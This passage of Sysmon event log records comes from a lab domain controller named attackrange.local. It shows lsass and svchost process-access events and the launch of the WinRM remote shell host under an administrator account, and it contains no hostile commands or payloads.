C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.565","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.565\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.565","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.698\r\nProcessGuid: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.698","ProcessGuid":"{41C8662E-20CF-5F25-0000-0010CCF40700}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010CCF40700}\r\nTargetProcessId: 5044\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.690","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010CCF40700}","TargetProcessId":"5044","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.690\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 